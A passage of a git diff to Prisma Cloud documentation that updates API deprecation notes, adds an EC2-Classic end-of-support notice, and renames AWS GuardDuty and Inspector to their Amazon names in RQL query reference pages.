23.4.1 release, the following Prisma Cloud Data Security APIs (v1, v2) for AWS cloud account onboarding, data settings, data profiles, snippets, and data patterns will be deprecated and new APIs (v3) will be added: +//RLP-96733 +|In the 23.4.2 release, the following Prisma Cloud Data Security APIs (v1, v2) for AWS cloud account onboarding, data settings, data profiles, snippets, and data patterns will be deprecated and new APIs (v3) will be added: *Deprecating Cloud Accounts Endpoints* @@ -247,6 +607,11 @@ The Viewer role includes the permissions. * userinput:[POST /config/v3/dss-api/snippets/dssTenantId/{dssTenantId}] +|tt:[End of Support for AWS Classic EC2 Service] +//RLP-96041, Added in 23.3.2. +|The userinput:[aws-ec2-classic-instance] API is planned for deprecation at the end of April 2023. As AWS has announced the depreciation of the resource type, Prisma Cloud will no longer ingest the userinput:[aws-ec2-classic-instance] API. For more information, see https://aws.amazon.com/blogs/aws/ec2-classic-is-retiring-heres-how-to-prepare/[Retiring EC2-Classic Networking]. + + |tt:[Prisma Cloud CSPM REST API for Alerts] |Some Alert API request parameters and response object properties are now deprecated. diff --git a/cspm/rql-reference/rql-reference/config-query/config-query-attributes.adoc b/cspm/rql-reference/rql-reference/config-query/config-query-attributes.adoc index 0baf4266d..506447085 100644 --- a/cspm/rql-reference/rql-reference/config-query/config-query-attributes.adoc +++ b/cspm/rql-reference/rql-reference/config-query/config-query-attributes.adoc @@ -95,11 +95,11 @@ Use the userinput:[count] attribute for a tally of the number of resources of a * userinput:[finding.type, finding.severity, finding.source] + -Use the finding attributes to query for vulnerabilities on workloads—destination or source resources—that have one or more host-related security findings. Prisma Cloud ingests host vulnerability data from external sources, such as Qualys, Tenable.io, AWS Inspector and ingests host and IAM users security-related alerts from AWS GuardDuty, or Prisma Cloud https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-compute/install/defender_types.html[Defenders] deployed on your hosts or containers. +Use the finding attributes to query for vulnerabilities on workloads—destination or source resources—that have one or more host-related security findings. Prisma Cloud ingests host vulnerability data from external sources, such as Qualys, Tenable.io, Amazon Inspector and ingests host and IAM users security-related alerts from Amazon GuardDuty, or Prisma Cloud https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-compute/install/defender_types.html[Defenders] deployed on your hosts or containers. + [NOTE] ==== -To leverage userinput:[finding] attributes, you must either enable an integration with the host vulnerability provider such as AWS GuardDuty or have installed Prisma Cloud Defenders in your environment. +To leverage userinput:[finding] attributes, you must either enable an integration with the host vulnerability provider such as Amazon GuardDuty or have installed Prisma Cloud Defenders in your environment. ==== + image::hostfinding-type-hostfinding-severity-query-1.png[scale=30] @@ -123,7 +123,7 @@ screen:[config from cloud.resource where finding.source = 'AWS Guard Duty' AND f ** *AWS GuardDuty*—Fetches all resources which have one or more findings reported by AWS GuardDuty. + -For AWS GuardDuty, the finding.type can be IAM or host—AWS GuardDuty IAM or AWS GuardDuty Host. +For Amazon GuardDuty, the finding.type can be IAM or host—AWS GuardDuty IAM or AWS GuardDuty Host. * userinput:[finding.name] + diff --git a/cspm/rql-reference/rql-reference/network-query/network-flow-log-query-attributes.adoc b/cspm/rql-reference/rql-reference/network-query/network-flow-log-query-attributes.adoc index 694d77975..3f57b36d2 100644 --- a/cspm/rql-reference/rql-reference/network-query/network-flow-log-query-attributes.adoc +++ b/cspm/rql-reference/rql-reference/network-query/network-flow-log-query-attributes.adoc @@ -90,7 +90,7 @@ image::dest-resource-in-resource-query-example-1.png[scale=40] * userinput:[finding.severity, finding.type, finding.source] + -Use finding attributes to query for vulnerabilities on destination or source resources that have one or more host-related security findings. Prisma Cloud ingests host vulnerability data from Prisma Cloud Defenders deployed on your cloud environments, and external sources such as Qualys, Tenable.io, AWS Inspector, and host and IAM-security related alerts from AWS GuardDuty. +Use finding attributes to query for vulnerabilities on destination or source resources that have one or more host-related security findings. Prisma Cloud ingests host vulnerability data from Prisma Cloud Defenders deployed on your cloud environments, and external sources such as Qualys, Tenable.io, AWS Inspector, and host and IAM-security related alerts from Amazon GuardDuty. + [NOTE] ====